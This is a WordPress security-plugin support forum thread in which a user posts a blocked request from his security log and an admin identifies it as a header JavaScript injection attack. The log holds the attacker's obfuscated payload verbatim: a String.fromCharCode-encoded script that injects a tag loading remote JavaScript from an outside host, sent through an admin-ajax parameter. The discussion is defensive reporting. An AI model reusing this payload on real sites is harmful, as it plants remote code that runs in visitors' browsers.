Interesting Item on Security Log

[Mike]

I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past.   It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

[403 GET Request: May 21, 2019 - 9:53 am]
BPS Pro: 13.9
WP: 5.2
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 192.99.38.186
Host Name: cp31-ca.under2.net
SERVER_PROTOCOL: language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 48, 51, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 49, 52, 44, 32, 49, 50, 49, 44, 32, 49, 48, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 48, 44, 32, 49, 48, 53, 44, 32, 49, 49, 48, 44, 32, 49, 48, 53, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 102, 108, 97, 115, 107, 46, 106, 115, 63, 116, 61, 116, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script> HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script
QUERY_STRING: action=update_zb_fbc_code&domain=</script><script
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0

[AITpro Admin]

Yep, this is a Header javascript injection attack.  BPS logs everything in a plain text file for exactly this reason.  BPS does not save or store Security Log fields in your WordPress database for exactly this reason.  Nothing to worry about.

[Mike]

Thanks for the quick response. BPS has been great. I experience 200-600 attacks a week (logged) and it has been that way for several years – never had a breach. I wish these folks (or bots) had something better to do.

[Author]

Posts